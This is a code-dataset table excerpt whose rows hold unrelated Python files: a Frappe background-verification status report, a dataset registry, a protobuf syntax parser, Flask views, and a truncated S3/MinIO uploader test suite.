max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
bvs/background_verification/report/checks_status_report/checks_status_report.py | vhrspvl/vhrs-bvs | 1 | 3400 | # Copyright (c) 2013, VHRS and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import (cint, cstr, date_diff, flt, getdate, money_in_words,
nowdate, rounded, today)
from datetime import datetime
from datetime import date
import datetime
from calendar import monthrange
def execute(filters=None):
columns = get_columns()
data = []
row = []
filters
applicant = applicants(filters)
for app in applicant:
row = [app.customer, app.ref_id, app.candidate_name,
app.in_date, app.status, app.checks_group]
if app.status != "Entry Pending":
cg = frappe.get_doc("Checks Group", app.checks_group)
if cg.employment_check1 == 1:
emp = frappe.get_doc("Employment Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check2 == 1:
emp = frappe.get_doc("Employment Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check3 == 1:
emp = frappe.get_doc("Employment Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check4 == 1:
emp = frappe.get_doc("Employment Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check1 == 1:
if frappe.db.exists("Education Check1", {
"applicant_id": app.ref_id}):
emp = frappe.get_doc("Education Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check2 == 1:
emp = frappe.get_doc("Education Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check3 == 1:
emp = frappe.get_doc("Education Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check4 == 1:
emp = frappe.get_doc("Education Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check1 == 1:
emp = frappe.get_doc("Address Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check2 == 1:
emp = frappe.get_doc("Address Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check3 == 1:
emp = frappe.get_doc("Address Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check4 == 1:
emp = frappe.get_doc("Address Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.family_check1 == 1:
emp = frappe.get_doc("Family Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Family Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check1 == 1:
emp = frappe.get_doc("Reference Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check2 == 1:
emp = frappe.get_doc("Reference Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check3 == 1:
emp = frappe.get_doc("Reference Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check4 == 1:
emp = frappe.get_doc("Reference Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.civil_check == 1:
emp = frappe.get_doc("Civil Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Civil Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.criminal_check == 1:
emp = frappe.get_doc("Criminal Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Criminal Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check1 == 1:
emp = frappe.get_doc("ID Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check2 == 1:
emp = frappe.get_doc("ID Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check3 == 1:
emp = frappe.get_doc("ID Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check4 == 1:
emp = frappe.get_doc("ID Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check5 == 1:
emp = frappe.get_doc("ID Check5", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check5", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check6 == 1:
emp = frappe.get_doc("ID Check6", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check6", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
data.append(row)
return columns, data
def get_columns():
columns = [
_("Project Name") + ":Link/Customer:200",
_("VHRS Ref. No") + ":Data:150",
_("Candidate Name") + ":Data:180",
_("Start Date") + ":Date:150",
_("Status") + ":Data:150",
_("Checks Group Name") + ":Data:150",
_("Emp Check1 Status") + ":Data:150",
_("Emp Check2 Status") + ":Data:150",
_("Emp Check3 Status") + ":Data:150",
_("Emp Check4 Status") + ":Data:150",
_("Edu Check1 Status") + ":Data:150",
_("Edu Check2 Status") + ":Data:150",
_("Edu Check3 Status") + ":Data:150",
_("Edu Check4 Status") + ":Data:150",
_("Add Check1 Status") + ":Data:150",
_("Add Check2 Status") + ":Data:150",
_("Add Check3 Status") + ":Data:150",
_("Add Check4 Status") + ":Data:150",
_("Family Check Status") + ":Data:150",
_("Ref Check1 Status") + ":Data:150",
_("Ref Check2 Status") + ":Data:150",
_("Ref Check3 Status") + ":Data:150",
_("Ref Check4 Status") + ":Data:150",
_("Civil Check1 Status") + ":Data:150",
_("Criminal Check2 Status") + ":Data:150",
_("ID Check1 Status") + ":Data:150",
_("ID Check2 Status") + ":Data:150",
_("ID Check3 Status") + ":Data:150",
_("ID Check4 Status") + ":Data:150",
_("ID Check5 Status") + ":Data:150",
_("ID Check6 Status") + ":Data:150",
]
return columns
def applicants(filters):
applicant = frappe.db.sql(
"""select app.checks_group,app.customer,app.ref_id,app.candidate_name,app.in_date,app.status from `tabApplicant` app where
app.in_date between %(start_date)s and %(end_date)s order by app.in_date""", {
"start_date": filters.get("from_date"),
"end_date": filters.get("to_date")
}, as_dict=1)
return applicant
| 2.09375 | 2 |
dataset/dataset.py | TeamOfProfGuo/few_shot_baseline | 0 | 3401 | <filename>dataset/dataset.py
import os
DEFAULT_ROOT = './materials'
datasets_dt = {}
def register(name):
def decorator(cls):
datasets_dt[name] = cls
return cls
return decorator
def make(name, **kwargs):
if kwargs.get('root_path') is None:
kwargs['root_path'] = os.path.join(DEFAULT_ROOT, name)
dataset = datasets_dt[name](**kwargs)
return dataset
| 2.515625 | 3 |
src/proto_formatter/syntax_parser.py | YiXiaoCuoHuaiFenZi/proto-formatter | 0 | 3402 | from .comment import CommentParser
from .protobuf import Protobuf
from .proto_structures import Syntax
class SyntaxParser():
@classmethod
def parse_and_add(cls, proto_obj: Protobuf, line, top_comment_list):
if proto_obj.syntax is not None:
raise 'multiple syntax detected!'
proto_obj.syntax = cls.parse_syntax(line, top_comment_list)
@classmethod
def parse_syntax(cls, line, top_comment_list):
value = cls._get_syntax_value(line)
comments = CommentParser.create_comment(line, top_comment_list)
syntax = Syntax(value, comments)
return syntax
@classmethod
def _get_syntax_value(cls, line):
line = line.strip().replace(' ', '')
lindex = len('syntax=')
rindex = line.index(';')
value = line[lindex:rindex].strip().replace('"', "").replace("'", "")
return value
| 2.640625 | 3 |
IPL/app/core/views.py | mgp-git/Flask | 0 | 3403 | <reponame>mgp-git/Flask<filename>IPL/app/core/views.py
from flask import render_template, request, Blueprint
core = Blueprint('core', __name__)
@core.route("/", methods=['GET', 'POST'])
def home():
return render_template('home.html')
@core.route("/about")
def about():
return render_template('about.html')
@core.route('/search', methods=['GET', 'POST'])
def search():
search_str = request.args.get('globalsearch')
return render_template('search.html', search_str=search_str)
| 2.0625 | 2 |
tests/test_s3.py | tdilauro/circulation-core | 1 | 3404 | <reponame>tdilauro/circulation-core
# encoding: utf-8
import functools
import os
from urllib.parse import urlsplit
import boto3
import botocore
import pytest
from botocore.exceptions import BotoCoreError, ClientError
from mock import MagicMock
from parameterized import parameterized
from ..mirror import MirrorUploader
from ..model import (
DataSource,
ExternalIntegration,
Hyperlink,
Identifier,
Representation,
create,
)
from ..s3 import (
MinIOUploader,
MinIOUploaderConfiguration,
MockS3Client,
MultipartS3Upload,
S3AddressingStyle,
S3Uploader,
S3UploaderConfiguration,
)
from ..testing import DatabaseTest
from ..util.datetime_helpers import datetime_utc, utc_now
class S3UploaderTest(DatabaseTest):
def _integration(self, **settings):
"""Create and configure a simple S3 integration."""
integration = self._external_integration(
ExternalIntegration.S3, ExternalIntegration.STORAGE_GOAL, settings=settings
)
integration.username = settings.get("username", "username")
integration.password = settings.get("password", "password")
return integration
def _add_settings_value(self, settings, key, value):
"""Adds a value to settings dictionary
:param settings: Settings dictionary
:type settings: Dict
:param key: Key
:type key: string
:param value: Value
:type value: Any
:return: Updated settings dictionary
:rtype: Dict
"""
if value:
if settings:
settings[key] = value
else:
settings = {key: value}
return settings
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
:param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
:type: Optional[Dict]
:return: New intance of S3 uploader
:rtype: S3Uploader
"""
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_REGION, region
)
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_ADDRESSING_STYLE, addressing_style
)
integration = self._integration(**settings)
uploader_class = uploader_class or S3Uploader
return uploader_class(integration, client_class=client_class)
class S3UploaderIntegrationTest(S3UploaderTest):
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL = os.environ.get(
"SIMPLIFIED_TEST_MINIO_ENDPOINT_URL", "http://localhost:9000"
)
SIMPLIFIED_TEST_MINIO_USER = os.environ.get(
"SIMPLIFIED_TEST_MINIO_USER", "minioadmin"
)
SIMPLIFIED_TEST_MINIO_PASSWORD = os.environ.get(
"SIMPLIFIED_TEST_MINIO_PASSWORD", "<PASSWORD>"
)
_, SIMPLIFIED_TEST_MINIO_HOST, _, _, _ = urlsplit(
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
)
minio_s3_client = None
"""boto3 client connected to locally running MinIO instance"""
s3_client_class = None
"""Factory function used for creating a boto3 client inside S3Uploader"""
@classmethod
def setup_class(cls):
"""Initializes the test suite by creating a boto3 client set up with MinIO credentials"""
super(S3UploaderIntegrationTest, cls).setup_class()
cls.minio_s3_client = boto3.client(
"s3",
aws_access_key_id=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER,
aws_secret_access_key=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
cls.s3_client_class = functools.partial(
boto3.client,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
def teardown_method(self):
"""Deinitializes the test suite by removing all the buckets from MinIO"""
super(S3UploaderTest, self).teardown_method()
response = self.minio_s3_client.list_buckets()
for bucket in response["Buckets"]:
bucket_name = bucket["Name"]
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
for object in response.get("Contents", []):
object_key = object["Key"]
self.minio_s3_client.delete_object(Bucket=bucket_name, Key=object_key)
self.minio_s3_client.delete_bucket(Bucket=bucket_name)
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
:param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
:type: Optional[Dict]
:return: New intance of S3 uploader
:rtype: S3Uploader
"""
if settings and "username" not in settings:
self._add_settings_value(
settings, "username", self.SIMPLIFIED_TEST_MINIO_USER
)
if settings and "password" not in settings:
self._add_settings_value(
settings, "password", self.SIMPLIFIED_TEST_MINIO_PASSWORD
)
if not client_class:
client_class = self.s3_client_class
return super(S3UploaderIntegrationTest, self)._create_s3_uploader(
client_class, uploader_class, region, addressing_style, **settings
)
class TestS3Uploader(S3UploaderTest):
def test_names(self):
# The NAME associated with this class must be the same as its
# key in the MirrorUploader implementation registry, and it's
# better if it's the same as the name of the external
# integration.
assert S3Uploader.NAME == ExternalIntegration.S3
assert (
S3Uploader == MirrorUploader.IMPLEMENTATION_REGISTRY[ExternalIntegration.S3]
)
def test_instantiation(self):
integration = self._external_integration(
ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL
)
integration.username = "your-access-key"
integration.password = "<PASSWORD>"
integration.setting(
S3UploaderConfiguration.URL_TEMPLATE_KEY
).value = "a transform"
uploader = MirrorUploader.implementation(integration)
assert True == isinstance(uploader, S3Uploader)
# The URL_TEMPLATE_KEY setting becomes the .url_transform
# attribute on the S3Uploader object.
assert "a transform" == uploader.url_transform
@parameterized.expand(
[
("empty_credentials", None, None),
("empty_string_credentials", "", ""),
("non_empty_string_credentials", "username", "password"),
]
)
def test_initialization(self, name, username, password):
# Arrange
settings = {"username": username, "password": password}
integration = self._external_integration(
ExternalIntegration.S3,
goal=ExternalIntegration.STORAGE_GOAL,
settings=settings,
)
client_class = MagicMock()
# Act
S3Uploader(integration, client_class=client_class)
# Assert
assert client_class.call_count == 2
service_name = client_class.call_args_list[0].args[0]
region_name = client_class.call_args_list[0].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[0].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[0].kwargs[
"aws_secret_access_key"
]
config = client_class.call_args_list[0].kwargs["config"]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == None
assert aws_secret_access_key == None
assert config.signature_version == botocore.UNSIGNED
assert (
config.s3["addressing_style"]
== S3UploaderConfiguration.S3_DEFAULT_ADDRESSING_STYLE
)
service_name = client_class.call_args_list[1].args[0]
region_name = client_class.call_args_list[1].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[1].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[1].kwargs[
"aws_secret_access_key"
]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == (username if username != "" else None)
assert aws_secret_access_key == (password if password != "" else None)
assert "config" not in client_class.call_args_list[1].kwargs
def test_custom_client_class(self):
"""You can specify a client class to use instead of boto3.client."""
integration = self._integration()
uploader = S3Uploader(integration, MockS3Client)
assert isinstance(uploader.client, MockS3Client)
def test_get_bucket(self):
buckets = {
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "banana",
S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "bucket",
}
buckets_plus_irrelevant_setting = dict(buckets)
buckets_plus_irrelevant_setting["not-a-bucket-at-all"] = "value"
uploader = self._create_s3_uploader(**buckets_plus_irrelevant_setting)
# This S3Uploader knows about the configured buckets. It
# wasn't informed of the irrelevant 'not-a-bucket-at-all'
# setting.
assert buckets == uploader.buckets
# get_bucket just does a lookup in .buckets
uploader.buckets["foo"] = object()
result = uploader.get_bucket("foo")
assert uploader.buckets["foo"] == result
@parameterized.expand(
[
(
"s3_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://dummy.s3.amazonaws.com/dummy",
None,
),
(
"s3_path_style_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_path_style_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://s3.amazonaws.com/dummy/dummy",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_path_style_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.us-east-2.amazonaws.com/a-path",
"us-east-2",
),
(
"s3_path_style_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://s3.us-east-2.amazonaws.com/a-bucket/a-path",
"us-east-2",
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.us-east-3.amazonaws.com/a-path",
"us-east-3",
),
(
"s3_path_style_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.us-east-3.amazonaws.com/a-bucket/a-path",
"us-east-3",
S3AddressingStyle.PATH.value,
),
(
"custom_http_url_and_path_without_slash",
"http://a-bucket.com/",
"a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"http://a-bucket.com/",
"/a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_without_slash",
"https://a-bucket.com/",
"a-path",
"https://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"https://a-bucket.com/",
"/a-path",
"https://a-bucket.com/a-path",
None,
),
]
)
def test_url(
self, name, bucket, path, expected_result, region=None, addressing_style=None
):
# Arrange
uploader = self._create_s3_uploader(
region=region, addressing_style=addressing_style
)
# Act
result = uploader.url(bucket, path)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"implicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
),
(
"implicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
None,
"us-east-2",
),
(
"explicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
),
(
"explicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
"us-east-2",
),
(
"http_url_template",
"bucket",
"the këy",
"http://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTP,
),
(
"https_url_template",
"bucket",
"the këy",
"https://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTPS,
),
]
)
def test_final_mirror_url(
self, name, bucket, key, expected_result, url_transform=None, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
if url_transform:
uploader.url_transform = url_transform
# Act
result = uploader.final_mirror_url(bucket, key)
# Assert
if not url_transform:
assert (
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT == uploader.url_transform
)
assert result == expected_result
def test_key_join(self):
"""Test the code used to build S3 keys from parts."""
parts = ["Gutenberg", b"Gutenberg ID", 1234, "Die Flügelmaus+.epub"]
assert (
"Gutenberg/Gutenberg%20ID/1234/Die%20Fl%C3%BCgelmaus%2B.epub"
== S3Uploader.key_join(parts)
)
@parameterized.expand(
[
(
"with_gutenberg_cover_generator_data_source",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/",
),
(
"with_overdrive_data_source",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/",
),
(
"with_overdrive_data_source_and_scaled_size",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/",
300,
),
(
"with_gutenberg_cover_generator_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_scaled_size_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/",
300,
"us-east-3",
),
]
)
def test_cover_image_root(
self,
name,
bucket,
data_source_name,
expected_result,
scaled_size=None,
region=None,
):
# Arrange
uploader = self._create_s3_uploader(region=region)
data_source = DataSource.lookup(self._db, data_source_name)
# Act
result = uploader.cover_image_root(bucket, data_source, scaled_size=scaled_size)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_default_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.amazonaws.com/",
),
(
"with_custom_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/",
"us-east-3",
),
]
)
def test_content_root(self, name, bucket, expected_result, region=None):
# Arrange
uploader = self._create_s3_uploader(region=region)
# Act
result = uploader.content_root(bucket)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_url",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/",
),
(
"s3_url_with_custom_region",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/",
"us-east-2",
),
("custom_http_url", "http://my-feed/", "SHORT", "http://my-feed/SHORT/"),
("custom_https_url", "https://my-feed/", "SHORT", "https://my-feed/SHORT/"),
]
)
def test_marc_file_root(
self, name, bucket, library_name, expected_result, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
library = self._library(short_name=library_name)
# Act
result = uploader.marc_file_root(bucket, library)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_identifier",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub",
),
(
"with_custom_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
"pdf",
),
(
"with_custom_dotted_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
".pdf",
),
(
"with_custom_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub",
None,
DataSource.UNGLUE_IT,
),
(
"with_custom_title",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub",
None,
None,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
),
(
"with_protected_access_and_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
False,
),
]
)
def test_book_url(
self,
name,
buckets,
identifier,
expected_result,
extension=None,
data_source_name=None,
title=None,
region=None,
open_access=True,
):
# Arrange
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
parameters = {"identifier": identifier, "open_access": open_access}
if extension:
parameters["extension"] = extension
if title:
parameters["title"] = title
if data_source_name:
data_source = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
parameters["data_source"] = data_source
# Act
result = uploader.book_url(**parameters)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"without_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
),
(
"without_scaled_size_and_with_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
None,
"us-east-3",
),
(
"with_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
),
(
"with_scaled_size_and_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
"us-east-3",
),
]
)
def test_cover_image_url(
self,
name,
buckets,
data_source_name,
identifier,
filename,
expected_result,
scaled_size=None,
region=None,
):
# identifier = self._identifier(foreign_id="ABOOK")
